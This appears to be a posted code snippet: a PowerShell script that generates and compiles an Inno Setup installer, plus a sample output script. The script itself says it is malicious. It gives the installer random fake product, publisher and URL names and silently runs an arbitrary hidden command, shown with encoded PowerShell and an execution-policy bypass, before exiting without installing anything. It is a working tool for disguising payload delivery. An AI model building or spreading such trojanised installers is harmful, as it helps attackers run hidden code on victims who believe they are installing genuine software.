This PowerShell script automates the creation of an Inno setup script that silently executes a command before the Setup is initiated, returning/exiting before any installation wizard appears.
The script will generate random installer details if not directly specified.
Command arguments are launched with cmd.exe /c.
The compiled installer is around 1.8Mb.
| #define AppName "CloudDynamically" | |
| #define AppVersion "55.45.39" | |
| #define AppPublisher "CloudFrameworks" | |
| #define AppURL "https:\\CloudFrameworks.com" | |
| #define SetupName "CloudDynamically" | |
| #define Output "C:\Users\kb\Desktop\temp" | |
| [Setup] | |
| AppName={#AppName} | |
| AppVersion={#AppVersion} | |
| AppPublisher={#AppPublisher} | |
| AppPublisherURL={#AppURL} | |
| AppSupportURL={#AppURL} | |
| AppUpdatesURL={#AppURL} | |
| AppCopyright={#AppPublisher} | |
| DefaultDirName={userpf}\CloudFrameworks | |
| ; "ArchitecturesAllowed=x64compatible" specifies that Setup cannot run | |
| ; on anything but x64 and Windows 11 on Arm. | |
| ArchitecturesAllowed=x64compatible | |
| ; "ArchitecturesInstallIn64BitMode=x64compatible" requests that the | |
| ; install be done in "64-bit mode" on x64 or Windows 11 on Arm, | |
| ; meaning it should use the native 64-bit Program Files directory and | |
| ; the 64-bit view of the registry. | |
| ArchitecturesInstallIn64BitMode=x64compatible | |
| ; Remove the following line to run in administrative install mode (install for all users). | |
| PrivilegesRequired=lowest | |
| OutputDir={#Output} | |
| OutputBaseFilename={#SetupName} | |
| UninstallDisplayName={#AppName} | |
| WizardStyle=modern | |
| Compression=lzma/max | |
| SolidCompression=yes | |
| ; Execute before install wizard, return false to exit before installer | |
| [Code] | |
| function InitializeSetup(): boolean; | |
| var | |
| ResultCode: integer; | |
| begin | |
| Exec(ExpandConstant('{cmd}'), '/c whoami >> C:\Users\kb\desktop\temp\iam.txt', '', SW_HIDE, ewWaitUntilTerminated, ResultCode); | |
| Result := False; | |
| end; |
| <# | |
| .SYNOPSIS | |
| Generates a malicious Inno setup script for executing a commandline. | |
| .DESCRIPTION | |
| This script generates an installer using the Inno Setup Compiler. | |
| It requires certain parameters to be provided for creating the setup package. | |
| .PARAMETER Name | |
| The name of the application being installed (optional). | |
| .PARAMETER Publisher | |
| The publisher of the application (optional). | |
| .PARAMETER Url | |
| The URL associated with the application (optional). | |
| .PARAMETER OutputDir | |
| The output directory where the installer will be saved (optional). | |
| .PARAMETER Favicon | |
| The path to the favicon file for the setup package (optional). | |
| .PARAMETER Command | |
| A mandatory command string that is required for the script to execute properly. | |
| .PARAMETER Mode | |
| A parameter to run as admin, poweruser, or lowest (optional). | |
| .EXAMPLE | |
| .\CreateInstaller.ps1 -Name "MyApp" -Publisher "MyCompany" -Url "https://www.example.com" -OutputDir "C:\Setup" -Favicon "C:\Icons\favicon.ico" -Command "powershell.exe -byp -enc MAqqwerq" | |
| This command creates an installer for "MyApp" published by "MyCompany" with a specified URL, output directory, and favicon. The command launches an encoded powershell string. | |
| .EXAMPLE | |
| .\CreateInstaller.ps1 -Command "powershell.exe -byp -enc MAqqwerq" -Mode admin | |
| This command creates an installer with randomized field values, no icon, executing an encoded powershell string. | |
| #> | |
| Param ( | |
| [string]$Name, | |
| [string]$Publisher, | |
| [string]$Url = "", | |
| [string]$OutputDir, | |
| [string]$Favicon, | |
| [Parameter(Mandatory=$true)] | |
| [string]$Command, | |
| [ValidateSet("admin", "poweruser", "lowest")] | |
| [string]$Mode="lowest" | |
| ) | |
| function Get-RandomVersion { | |
| # Generate three random numbers between 1 and 99 | |
| $major = Get-Random -Minimum 1 -Maximum 100 | |
| $minor = Get-Random -Minimum 1 -Maximum 100 | |
| $patch = Get-Random -Minimum 1 -Maximum 100 | |
| # Combine the numbers into a version string | |
| return "$major.$minor.$patch" | |
| } | |
| $verbs = @("Cloud", "AI", "IoT", "Cyber", "Quantum") | |
| $adverbs = @("Securely", "Efficiently", "Innovatively", "Dynamically", "Reliably") | |
| $nouns = @("Systems", "Networks", "Solutions", "Platforms", "Frameworks") | |
| $randomVerb = Get-Random -InputObject $verbs | |
| $randomAdverb = Get-Random -InputObject $adverbs | |
| $randomNoun = Get-Random -InputObject $nouns | |
| If (!($Name)) { | |
| $Name = "$randomVerb$randomAdverb" | |
| } | |
| If (!($Publisher)) { | |
| $AppPublisher = "$randomVerb$randomNoun" | |
| } | |
| If (!($Url)) { | |
| $AppUrl = "https:\\$randomVerb$randomNoun.com" | |
| } | |
| If (!($OutputDir)) { | |
| $OutputDir = Get-Location | |
| } | |
| If ($Favicon) { | |
| $FaviconSetting = "SetupIconFile=`"$Favicon`"" | |
| } Else { $FaviconSetting = "" } | |
| $AppVersion = Get-RandomVersion | |
| $Inno = @" | |
| #define AppName "$Name" | |
| #define AppVersion "$AppVersion" | |
| #define AppPublisher "$AppPublisher" | |
| #define AppURL "$AppURL" | |
| #define SetupName "$Name" | |
| #define Output "$OutputDir" | |
| [Setup] | |
| AppName={#AppName} | |
| AppVersion={#AppVersion} | |
| AppPublisher={#AppPublisher} | |
| AppPublisherURL={#AppURL} | |
| AppSupportURL={#AppURL} | |
| AppUpdatesURL={#AppURL} | |
| AppCopyright={#AppPublisher} | |
| DefaultDirName={userpf}\$AppPublisher | |
| ; "ArchitecturesAllowed=x64compatible" specifies that Setup cannot run | |
| ; on anything but x64 and Windows 11 on Arm. | |
| ArchitecturesAllowed=x64compatible | |
| ; "ArchitecturesInstallIn64BitMode=x64compatible" requests that the | |
| ; install be done in "64-bit mode" on x64 or Windows 11 on Arm, | |
| ; meaning it should use the native 64-bit Program Files directory and | |
| ; the 64-bit view of the registry. | |
| ArchitecturesInstallIn64BitMode=x64compatible | |
| ; PrivilegesRequired: admin, poweruser, lowest | |
| PrivilegesRequired=$mode | |
| OutputDir={#Output} | |
| OutputBaseFilename={#SetupName} | |
| UninstallDisplayName={#AppName} | |
| WizardStyle=modern | |
| Compression=lzma/max | |
| SolidCompression=yes | |
| $FaviconSetting | |
| ; Execute before install wizard, return false to exit before installer | |
| [Code] | |
| function InitializeSetup(): boolean; | |
| var | |
| ResultCode: integer; | |
| begin | |
| Exec(ExpandConstant('{cmd}'), '/c $Command', '', SW_HIDE, ewWaitUntilTerminated, ResultCode); | |
| Result := False; | |
| end; | |
| "@ | |
| $Inno | Out-File -Force -FilePath $(Join-Path -Path $OutputDir -ChildPath "$randomVerb$randomNoun.iss") -Encoding utf8 | |
| $Output = $(Join-Path -Path $OutputDir -ChildPath "$randomVerb$randomNoun.iss") | |
| If ( Test-Path "C:\Program Files (x86)\Inno Setup 6\compil32.exe" ) { | |
| Write-Host -ForegroundColor Green "Inno Setup Installed. Starting compilation..." | |
| Start-Process -FilePath "C:\Program Files (x86)\Inno Setup 6\compil32.exe" -ArgumentList "/cc `"$Output`"" -NoNewWindow -Wait | |
| } Else { | |
| Write-Host -ForegroundColor Red "Inno Setup is not installed. Not compiling." | |
| } |